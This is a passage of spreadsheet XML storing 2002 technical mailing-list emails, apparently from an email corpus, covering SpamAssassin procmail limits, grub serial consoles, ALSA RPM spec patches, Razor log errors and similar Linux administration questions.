  </si>
  <si>
    <t>Thu, 29 Aug 2002 17:10:47 -0400 (EDT)</t>
  </si>
  <si>
    <t>"Larry W. Virden" &lt;lvirden@cas.org&gt;</t>
  </si>
  <si>
    <t>&lt;sitescooper-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[scoop] Scoop MS Word .doc file into something that plucker or other Palm app can display?</t>
  </si>
  <si>
    <t>I am wondering whether there's a way that I can use sitescooper and/or plucker or some other free utility to convert word documents into something a bit more palmos friendly? I don't have a Windows machine, so it becomes problematic to convert them; I know that if this were not the case, in Word I could save them as some other more friendly format. --  Tcl'2002 Sept 16, 2002, Vancouver, BC [URL]http://www.tcl.tk[/URL] Larry W. Virden   Even if explicitly stated to the contrary, nothing in this posting should  be construed as representing my employer's opinions. -&gt;&lt;- ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Sitescooper-talk mailing list Sitescooper-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.tcl.tk http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: &lt;mice@crackmice.com&gt;\nFrom: "Gerry Carr" &lt;Gerry.Carr@eWare.com&gt;\nDate: Thu, 29 Aug 2002 17:07:35 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 17:07:35 +0100</t>
  </si>
  <si>
    <t>"Gerry Carr" &lt;Gerry.Carr@eWare.com&gt;</t>
  </si>
  <si>
    <t>&lt;mice@crackmice.com&gt;</t>
  </si>
  <si>
    <t>people we know on the web</t>
  </si>
  <si>
    <t>[URL]http://www.bbc.co.uk[/URL]	\n\nfirst of a very short series.\n\ngerry\n_______________________________________________\nCrackmice mailing list\nCrackmice@crackmice.com\n[URL]http://crackmice.com[/URL]</t>
  </si>
  <si>
    <t>http://www.bbc.co.uk http://crackmice.com</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;\nDate: Thu, 29 Aug 2002 17:01:27 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 17:01:27 +0200</t>
  </si>
  <si>
    <t>On Thursday 29 August 2002 16:39 CET Mike Burger wrote: &gt; &gt;[...] &gt; &gt; re-check I find it immediately: &gt; &gt; :0fw &gt; &gt; * &lt; 250000 &gt; &gt; | spamassassin -P &gt; &gt; &gt; &gt; Works perfectly now. Sorry for being such a pest! ;-) &gt; &gt;[...] &gt; &gt; I'm using SA via spamc/spamd, and a global /etc/procmail file.  I'm &gt; wondering if this would also work in that fashion. spamc will skip every file bigger than 250k on it's own. It's got the  command line switch -s to change this value. But it doesn't hurt of course  to use the procmail limit. Malte --  -- Coding is art. --  ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Bart Schaefer &lt;schaefer@zanshin.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Thu, 29 Aug 2002 17:00:12 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 17:00:12 +0100</t>
  </si>
  <si>
    <t>Bart Schaefer said:\n\n&gt; This is off the topic of the rest of this discussion, but amavisd (in all\n&gt; its incarnations) and MIMEDefang and several other MTA plugins all reject\n&gt; at SMTP time messages that scores higher than some threshold (often 10).  \n\nargh, they do not, do they?   the FPs must be just gigantic :(\n\n&gt; If some new release were to start scoring all spam no higher than 5.1,\n&gt; there'd better be _zero_ FPs, because all those filters would drop their\n&gt; thresholds to 5.\n\nWell, my point is more that we should aim our rescoring algorithm so that\na spam hits 5.0.    Any higher does us no good, as it means an FP is\na lot harder to recover from, using compensation rules.\n\nSpams *will* hit higher than that -- that's just the way the scoring works.\nbut for our code to be effective, and spread the range of scores\ncorrectly, we just have to optimise to hit 1 threshold.\n\n--j.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "wintermute" &lt;cout@eircom.net&gt;\nDate: Thu, 29 Aug 2002 16:58:04 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 16:58:04 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] eircoms adsl modems</t>
  </si>
  <si>
    <t>Not true on the choice part.\n\nAfter three weeks of me telling eircom that I did not in fact need nor want\ntheir ?1800 worth of router and firewall\nnor their onsite survey... for the uncapped service I actually managed to\nget a 4 port modem (after asking for a 1 port modem) instead of ye olde\nhardware router &amp; firewall and eircom onsite.\n\nI would have argued for the 1 port modem... (which I had asked for), but a\nDirector wanted the DSL up ... and fast....\n\nStill it only took me three weeks to get (almost) what I\nwanted....................................\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG list &lt;ilug@linux.ie&gt;\nFrom: Colin Whittaker &lt;grimnar@redbrick.dcu.ie&gt;\nDate: Thu, 29 Aug 2002 16:51:17 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 16:51:17 +0100</t>
  </si>
  <si>
    <t>Colin Whittaker &lt;grimnar@redbrick.dcu.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Re: serial console...not quite working</t>
  </si>
  <si>
    <t>John P. Looney stated the following on Thu, Aug 29, 2002 at 03:31:11PM +0100 :\n&gt;  I'm not sure what exactly is wrong with this, but I can't get a redhat\n&gt; 7.1 box to use ttyS0 as a console.\n&gt; \n&gt;  The relevant bits of /boot/grub/grub.conf are:\n&gt; \n&gt; serial --unit=0 --speed=115200\n&gt; terminal --timeout=2 console serial\n&gt; title=linux\n&gt;    root (hd0,4)\n&gt;    kernel /boot/bzImage ro root=/dev/md0 console=ttyS0,115200n81\n															     ^\nThat 1 is unneeded and is probably whats upsetting your kernel\n\nwe use "console=ttyS0,9600n8" but the 9600 is mainly cos we are a cisco\nshop and its to keepo everyhting the same.\n\nColin\n-- \n"Design" is like a religion - too much of it makes you inflexibly and unpopular.\n		Linus Torvalds\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: macarthy@iol.ie\nFrom: Waider &lt;waider@waider.ie&gt;\nDate: Thu, 29 Aug 2002 16:41:14 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 16:41:14 +0100</t>
  </si>
  <si>
    <t>macarthy@iol.ie</t>
  </si>
  <si>
    <t>Re: [ILUG] Looking for a file / directory in zip file</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----\n\nJustin MacCarthy wrote:\n| Is there a way to look for a particular file or directory in 100's of zip\n| files??\n| Something like zgrep but for the filename instead of a word\n|\n| Thanks Justin\n|\n|\n\nprobably there are more elegant solutions, but if your zips are in one\ndirectory you can do something like\n\nfor i in *.zip\ndo\nif unzip -v $i | grep -q FILEYOUWANT\nthen\n~  echo $i\nfi\ndone\n\nCheers,\nWaider.\n- --\nwaider@waider.ie / Yes, it /is/ very personal of me\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: Using GnuPG with Mozilla - [URL]http://enigmail.mozdev.org[/URL]\n\niQEVAwUBPW5AmaHbXyzZsAb3AQH+qQgA1vnUjJUwGDa1yCRQd3vZAnhkCF0KDBBA\no9MYq4CUg9cEzKALkTyZu4eOprhL50ReaICUGLMMEc5htU9zove4F+CSuvbAKKHL\nnx7xa6kk2V+LFnwS6hWpdQolCaT+4iGZZbdFwmyNAWb/IrEYB0R4gp05sitDOl5U\nRRlzYSM3IUYDrYpDUuX7Ta7bLvSdC1PpWSqy/wXphNIh7Bs2+eB9ERAujuqi6vJo\nMBichYb3f3teVCQUbxTcaMowjpmv/Xm3gdUlGrUFbpc2O7447Xi5uDfRexzzDoJT\nHlFS6OO2ZqzcMrtUYEgsfyqpaF1WuD38JoFpa2TmSyX74bBhxS8ecw==\n=KYCm\n-----END PGP SIGNATURE-----\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://enigmail.mozdev.org http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "Ilug@Linux.Ie" &lt;ilug@linux.ie&gt;\nFrom: "Justin MacCarthy" &lt;macarthy@iol.ie&gt;\nDate: Thu, 29 Aug 2002 16:37:26 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 16:37:26 +0100</t>
  </si>
  <si>
    <t>[ILUG] Looking for a file / directory in zip file</t>
  </si>
  <si>
    <t>Is there a way to look for a particular file or directory in 100's of zip\nfiles??\nSomething like zgrep but for the filename instead of a word\n\nThanks Justin\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Thu, 29 Aug 2002 16:36:53 -0700</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 16:36:53 -0700</t>
  </si>
  <si>
    <t>On Thu, Aug 29, 2002 at 07:33:44PM -0400, cmeclax po'u le cmevi'u ke'umri wrote:\n&gt; \n&gt; Was it sent in HTML? If so, and it had a background, the background may have \n&gt; been sent in a spam.\n\nrazor-agents 2.14 needs all parts to be spam to make a positive decision\n(though this will change with the next release), so it couldn't have been\na background. Could you send me the debug log?\n\ncheers,\nvipul.\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "wintermute" &lt;cout@eircom.net&gt;\nDate: Thu, 29 Aug 2002 16:17:26 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 16:17:26 +0100</t>
  </si>
  <si>
    <t>It will function as a router if that is what you wish.\n\nIt even looks like the modem's embedded OS is some kind of linux, being that\nit has interesting interfaces like eth0.\n\nI don't use it as a router though.... I just have it do the absolute minimum\nDSL stuff and do all the really fun stuff like pppoe on my linux box........\n\nAlso the manual tells you what the default password is.\n\nDon't forget to run pppoe over the alcatel speedtouch 350i as in my case you\n'HAVE TO' have a bridge configured in the router/modem's software........\nThis lists your VCI values etc.\n\n\n&gt; Also, does anyone know if the high-end SpeedTouch, with\n&gt; 4 ethernet ports, can act as a full router or do I still\n&gt; need to run a pppoe stack on the linux box?\n&gt;\n&gt; Regards,\n&gt;\n&gt; Vin\n&gt;\n&gt;\n&gt; --\n&gt; Irish Linux Users' Group: ilug@linux.ie\n&gt; [URL]http://www.linux.ie[/URL] for (un)subscription\ninformation.\n&gt; List maintainer: listmaster@linux.ie\n&gt;\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 29 Aug 2002 14:22:52 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 14:22:52 +0200</t>
  </si>
  <si>
    <t>Re: /home/dude</t>
  </si>
  <si>
    <t>Once upon a time, Axel wrote : &gt; I am now relaxed again ;), and pass this info on. Probably Matthias Saou &gt; himself is "dude", and some package has hardwired a path in his build &gt; directory. It would be nice to find out which and fix it, but I am using &gt; too many of the freshrpm suite to narrow it down. Indeed, my usual login is "dude" (and has been since long before "The Big Lebowsky" came out ;-)), and it seems the some programs wrongly hard code my home directory when being compiled :-( For instance : [dude@python dude]$ strings /usr/bin/gentoo | grep dude /home/dude/ [dude@python dude]$ strings /usr/bin/xine | grep dude /home/dude/redhat/tmp/xine-root/usr/share/locale These should probably be considered bugs in the program's build process (especially for xine, look at that!), I'll report them upstream if/when I have some time. Thanks for noticing this! Matthias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Daniel Pavel &lt;danielpavel@myrealbox.com&gt;\nDate: Thu, 29 Aug 2002 13:56:45 +0300</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 13:56:45 +0300</t>
  </si>
  <si>
    <t>Daniel Pavel &lt;danielpavel@myrealbox.com&gt;</t>
  </si>
  <si>
    <t>Matthias Saou wrote: &gt; OK, I'll add this. Cool :) &gt; Requiring a file that isn't part of an rpm is not possible, no, except &gt; maybe by stopping the build process if it isn't found... but that's errr... &gt; ugly! &gt; And I really think that for people who installed a kernel from sources, the &gt; easiest is to install the alsa kernel drivers from source too... Yes, it is...  But then alsa-driver requires alsa-kernel, and I don't quite  like --nodeps... &gt; This would be a tricky one since to use the "--with " feature of &gt; rpmbuild, I think you'd need to add individual handling of each and every &gt; card :-/ That's ok.  I was only considering it for the sake of tweaking anyway, not  for some real-world need :). &gt; That's what the "alsa-driver" is there for, create all the base files &gt; excluding the kernel drivers. What I would suggest for dependency reasons &gt; it to install an "alsa-kernel" for the original kernel (you've kept it, &gt; right? ;-)) and install ALSA modules from source for custom kernels built &gt; from source. Um...  I keep 2.4.18-12.2 for emergency sitations (like I forget to include  keyboard support in kernel, dumb me), but alsa-kernel_2.4.18-10 does not  require kernel-2.4.18-10, so that's ok. &gt; Matthias -silent --  ... And on the seventh day, God was arrested for tresspassing. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Fox" &lt;lds0062@cdc.net&gt;\nDate: Thu, 29 Aug 2002 13:36:17 -0400</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 13:36:17 -0400</t>
  </si>
  <si>
    <t>[Razor-users] Collision of hashes?</t>
  </si>
  <si>
    <t>The following was personal correspondence between two people.  I can't\nfathom how Razor thinks it is spam:\n\n&gt;\n&gt; We are struggling with the decisions related to wether or not to\n&gt; go ahead with our plans to purchase an OCR and forms\n&gt; scanning solution.\n&gt;\n&gt; An outside consultant mentioned that he had heard that not to\n&gt; long ago you folks were considering implementing OCR\n&gt; technology to reduce data entry costs and improve efficiency.\n&gt; If you could let us know if you did move foreward with any\n&gt; plans in that direction it would be of great help to us. May I ask\n&gt; what initialy prompted you to consider OCR? Did you decide it\n&gt; could help your compamy? What software did you go with?\n&gt; Would you recomend we take a look at it?\n&gt; At present we are still planning to continue our research until\n&gt; we decide which OCR system best suits our needs, then\n&gt; implement it quickly.\n&gt;\n&gt; If you are just starting to consider this\n&gt; technology feel free to stay in touch. We will let you know what\n&gt; we decide on and if it works for us.\n&gt;\n&gt; If you cannot advise on this please forward this E-mail to the\n&gt; proper individual in your company who might be able to help with\n&gt; this.\n&gt; Thanks,\n&gt; Jay\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Urban Boquist &lt;urban@boquist.net&gt;\nFrom: Matt Sergeant &lt;msergeant@startechgroup.co.uk&gt;\nDate: Thu, 29 Aug 2002 13:33:53 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 13:33:53 +0100</t>
  </si>
  <si>
    <t>Urban Boquist &lt;urban@boquist.net&gt;</t>
  </si>
  <si>
    <t>Urban Boquist wrote: &gt; Hi Matt, and thanks for your quick reply. &gt;  &gt; Matt&gt; Don't run SA on mails this large. &gt;  &gt; That would be fine, if I only understood how I should do that. I can't &gt; find anything in the SA documention that mentions some kind of upper &gt; limit for the size of a message. What should I put in my user_prefs &gt; file? &gt;  &gt; I run SA from procmail btw, but I can't imagine that procmail would be &gt; able to check the size of a message before handing it over to SA? That's exactly what it can do: :0fw &lt;250000 | spamassassin -P ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Urban Boquist &lt;urban@boquist.net&gt;\nFrom: Matt Sergeant &lt;msergeant@startechgroup.co.uk&gt;\nDate: Thu, 29 Aug 2002 12:46:12 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 12:46:12 +0100</t>
  </si>
  <si>
    <t>Urban Boquist wrote:\n&gt; If I run spamassassin on this message:\n&gt; \n&gt;    [URL]http://www.boquist.net[/URL]\n&gt; \n&gt; it seems to hang. Memory usage goes up to 73MB and stays there. I have\n&gt; let it run for an hour before I killed it. This was on a\n&gt; Pentium-II-366. Yes, I know, a bit slow, but still...\n&gt; \n&gt; Can anyone else confirm this hang? Maybe I should just upgrade...\n\nDon't run SA on mails this large. Most people tend to ignore mails \nlarger than about 250K in spamassassin processing, because it just kills \nperformance. There are some known issues with the parsing (such as the \nHTML parsing stuff which is much improved in 2.40 which we're soon to \nrelease), but nothing that's too likely to be fixed by 2.40. Perhaps in \n2.50 though.\n\nMatt.\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.boquist.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Daniel Pavel &lt;danielpavel@myrealbox.com&gt;\nDate: Thu, 29 Aug 2002 12:46:08 +0300</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 12:46:08 +0300</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --------------090303060407010605030507 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Matthias Saou wrote:  &gt; I guess/hope some other people from the list will try it out ;-)  &gt;  &gt; Both problems you reported (libasound.so and wrong xine dependency) are now  &gt; fixed in the current packages.  &gt;  &gt; Oh, it's maybe also worth pointing out : I've implemented at last sorting  &gt; by both last change date and alphabetically for my "build list" in the php  &gt; code : [URL]http://freshrpms.net[/URL]  &gt;  &gt; And yes, I accept patches/comments/suggestions about all those spec files! Sure thing :) I've added to the spec some flags to remove OSS and ISA-PNP support at build time if one wishes to, so is's possible to do a 	rpmbuild --recompile  --without oss --without isapnp (I haven't included OSS in my 2.4.19, because VT82433 on my motherboard is not supported :( yet, and I'm too lazy to recompile the kernel :)). Also, having the kernel compiled by me, I have no kernel-source package installed.  I've added a flag "kernsrc", that also can be used --without, to remove the dependency for kernel-source at build time.  It would be nice to check the correct kernel include files actually exist (/lib/modules/`uname -r`/build/include/linux/*.h), though; however, I'm a beginner in RPM building -- is it possible to BuildRequire for a file not provided by a package at all?  I've googled a bit, and found no way to do that. I was also considering adding some sort of flag for the --with-cards option in alsa's ./configure, but don't know how to do that.  Only found out about --without from your first alsa-driver.spec, and existing RPM docs  don't help much. Oh, and one more thing :).  At first I've installed the first version of alsa-driver for 2.4.18-10, although I don't have that kernel, to supply the dependency for the rest of the alsa rpm's, and compiled the modules from source.  It created the /dev files and all. Then wanted to make my own rpm for 2.4.19, so now I'm trying to rpmbuild the alsa-kernel package.  Removed all alsa rpms, and tried my spec: rpmbuild --ba alsa-driver.spec.mine --without oss --without isapnp --without kernsrc But I get this: ==[long successful compile snipped]===================================== warning: File listed twice: /dev/adsp warning: File listed twice: /dev/amidi Finding  Provides: /usr/lib/rpm/find-provides Finding  Requires: /usr/lib/rpm/find-requires PreReq: /bin/sh /bin/sh rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1 rpmlib(CompressedFileNames) &lt;= 3.0.4-1 Requires(interp): /bin/sh /bin/sh Requires(rpmlib): rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1 rpmlib(CompressedFileNames) &lt;= 3.0.4-1 Requires(post): /bin/sh Requires(postun): /bin/sh Requires: alsa-kernel = 0.9.0rc3 /sbin/depmod Processing files: alsa-kernel-0.9.0rc3-fr4_2.4.19 Finding  Provides: /usr/lib/rpm/find-provides Finding  Requires: /usr/lib/rpm/find-requires PreReq: rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1 rpmlib(CompressedFileNames) &lt;= 3.0.4-1 Requires(rpmlib): rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1 rpmlib(CompressedFileNames) &lt;= 3.0.4-1 Requires: alsa-driver = 0.9.0rc3 kernel = 2.4.19 Checking for unpackaged file(s): /usr/lib/rpm/check-files /var/tmp/alsa-driver-0.9.0rc3-root error: Installed (but unpackaged) file(s) found:      /etc/makedev.d/00macros      /etc/rc.d/init.d/alsasound RPM build errors:       File listed twice: /dev/adsp       File listed twice: /dev/amidi       Installed (but unpackaged) file(s) found:      /etc/makedev.d/00macros      /etc/rc.d/init.d/alsasound ======================================================================== Like I said, I'm a beginned with RPM building, so I don't understand much of what's going on here.  The 00macros file is from the MAKEDEV rpm, and alsasound was supposed to be installed by alsa-driver, I think.    It is not in the filesystem, anyway. I've looked in /var/tmp/alsa-driver-0.9.0rc3-root, they are there in etc.  For 00macros I think the part that does it is this line in alsa-driver.spec: cp -a %{_sysconfdir}/makedev.d/00macros /{buildroot}%{_sysconfdir}/makedev.d/ And alsasound is installed by %{BUILDIDR}/Makefile. Oh, and I think I've forgot to mention, I'm running beta-null :).  &gt; Matthias -silent --  ... And on the seventh day, God was arrested for tresspassing. --------------090303060407010605030507 Content-Type: text/plain;  name="alsa-driver.spec.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline;  filename="alsa-driver.spec.patch" 6a7,17 &gt; &gt; %define withoss               yes &gt; %{?_without_oss:%define withoss no} &gt; &gt; %define withisapnp    auto &gt; %{?_without_isapnp:%define withisapnp no} &gt; &gt; %define kernsrc       1 &gt; %{?_without_kernsrc:%define kernsrc 0} &gt; &gt; 20a32 &gt; %if %{kernsrc} 21a34,36 &gt; %else &gt; BuildRequires: MAKEDEV &gt; %endif 64c79 &lt; %configure --- &gt; %configure --with-oss=%{withoss} --with-isapnp=%{withisapnp} 119a135,137 &gt; * Thu Aug 29 2002 Daniel Pavel  &gt; - Added OSS and ISA-PNP build-time flags. &gt; - Added kernel-source requirement flag. --------------090303060407010605030507-- _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Spamassassin-talk@example.sourceforge.net\nFrom: Jim McCullars &lt;jim@info.uah.edu&gt;\nDate: Thu, 29 Aug 2002 12:37:37 -0500 (CDT)</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 12:37:37 -0500 (CDT)</t>
  </si>
  <si>
    <t>Spamassassin-talk@example.sourceforge.net</t>
  </si>
  <si>
    <t>Re: [SAtalk] Tru64 compile of SA</t>
  </si>
  <si>
    <t>On Thu, 29 Aug 2002, Rick Beebe wrote:\n\n&gt; &gt; cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has no\n&gt; &gt; linka\n&gt; &gt; ge and has a prior declaration in this scope at line number 572 in file\n&gt; &gt; /usr/inc\n&gt; &gt; lude/sys/types.h. (nolinkage)\n&gt; &gt; typedef unsigned long   in_addr_t;      /* base type for internet address\n&gt; &gt; */\n&gt;\n&gt; Don't worry about the warnings. To fix the error, edit spamc.c and right\n\n   Thanks for posting this tip - I had the same problem compiling with\nTru64 and that took care of it.\n\n   When I did the "make install" I got this error:\n\nLOCK:  -f /etc/mail/spamassassin/local.cf\n || cp rules/local.cf /etc/mail/spamassassin/local.cf\nsh: syntax error at line 1: `||' unexpected\n*** Exit 2\nStop.\n\n   It appears that this comes from the "inst_cfs:" part of the Makefile,\nwhich copies local.cf into /etc/mail/spamassassin.  The Makefile has\nbrackets around the -f test, but they don't show up above.  Any ideas?\n\nJim\n*-------------------------------------------------------------------------*\n* James H. McCullars                 I Phone: (256) 824-2610              *\n* Director of Systems &amp; Operations   I Fax:   (256) 824-6643              *\n* Computer &amp; Network Services        I Internet: mccullj@email.uah.edu    *\n* The University of Alabama          I -----------------------------------*\n*    in Huntsville                   I                                    *\n* Huntsville, AL 35899               I This space for rent - CHEAP!       *\n*-------------------------------------------------------------------------*\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: "Michael Duff" &lt;michael.duff@sri.com&gt;\nDate: Thu, 29 Aug 2002 12:17:27 -0700</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 12:17:27 -0700</t>
  </si>
  <si>
    <t>"Michael Duff" &lt;michael.duff@sri.com&gt;</t>
  </si>
  <si>
    <t>[Razor-users] Re: Can't call method "log" with SA/Razor2</t>
  </si>
  <si>
    <t>This is happening due to insufficient write access to the "razor-agent.log" file. I was getting the same error, but only as a non-root user.  As a quick workaround, you can do "chmod go+w razor-agent.log". In Agent.pm, when then the Logger object is created, it doesn't check whether the logfile is writable by the current user. Then, when a write attempt is made, it bails out with the "unblessed reference" error. Hope that helps, Michael &gt; I just noticed the following log entries in my syslog with the latest &gt; Spamassassin CVS (set up using spamc/spamd) and razor-agents 2.14: &gt; &gt; Jul 26 17:30:09 timmy spamd[54928]: razor2 check skipped: No such file or &gt; directory Can't call method "log" on unblessed reference at &gt; /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Agent.pm line 211, &gt;  line 25. &gt; &gt; I saw this after checking if my upgrade from razor-agents 2.12 to 2.14 went &gt; okay, but the problem is still there after downgrading back to 2.12.  I &gt; don't really know when this started happening, :-/ &gt; &gt; Any ideas on the problem? &gt; &gt; - Robert ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 29 Aug 2002 12:09:26 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 12:09:26 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Daniel wrote : &gt;  &gt; And yes, I accept patches/comments/suggestions about all those spec &gt;  &gt; files! &gt;  &gt; Sure thing :) Cool :-) &gt; I've added to the spec some flags to remove OSS and ISA-PNP support at &gt; build time if one wishes to, so is's possible to do a &gt;  &gt; 	rpmbuild --recompile  --without oss --without isapnp OK, I'll add this. &gt; Also, having the kernel compiled by me, I have no kernel-source package &gt; installed.  I've added a flag "kernsrc", that also can be used &gt; --without, to remove the dependency for kernel-source at build time.  It &gt; would be nice to check the correct kernel include files actually exist &gt; (/lib/modules/`uname -r`/build/include/linux/*.h), though; however, I'm &gt; a beginner in RPM building -- is it possible to BuildRequire for a file &gt; not provided by a package at all?  I've googled a bit, and found no way &gt; to do that. Requiring a file that isn't part of an rpm is not possible, no, except maybe by stopping the build process if it isn't found... but that's errr... ugly! And I really think that for people who installed a kernel from sources, the easiest is to install the alsa kernel drivers from source too... &gt; I was also considering adding some sort of flag for the --with-cards &gt; option in alsa's ./configure, but don't know how to do that.  Only found &gt; out about --without from your first alsa-driver.spec, and existing RPM &gt; docs don't help much. This would be a tricky one since to use the "--with " feature of rpmbuild, I think you'd need to add individual handling of each and every card :-/ &gt; Oh, and one more thing :).  At first I've installed the first version of &gt; alsa-driver for 2.4.18-10, although I don't have that kernel, to supply &gt; the dependency for the rest of the alsa rpm's, and compiled the modules &gt; from source.  It created the /dev files and all. That's what the "alsa-driver" is there for, create all the base files excluding the kernel drivers. What I would suggest for dependency reasons it to install an "alsa-kernel" for the original kernel (you've kept it, right? ;-)) and install ALSA modules from source for custom kernels built from source. &gt; Then wanted to make my own rpm for 2.4.19, so now I'm trying to rpmbuild &gt; the alsa-kernel package.  Removed all alsa rpms, and tried my spec: &gt;  &gt; rpmbuild --ba alsa-driver.spec.mine --without oss --without isapnp &gt; --without kernsrc &gt;  &gt; But I get this: &gt;  &gt; ==[long successful compile snipped]===================================== &gt; RPM build errors: &gt;       File listed twice: /dev/adsp &gt;       File listed twice: /dev/amidi &gt;       Installed (but unpackaged) file(s) found: &gt;      /etc/makedev.d/00macros &gt;      /etc/rc.d/init.d/alsasound &gt; ======================================================================== &gt;  &gt; Oh, and I think I've forgot to mention, I'm running beta-null :). Indeed : The rpm 4.1 snapshot in (null) has a few new features among which 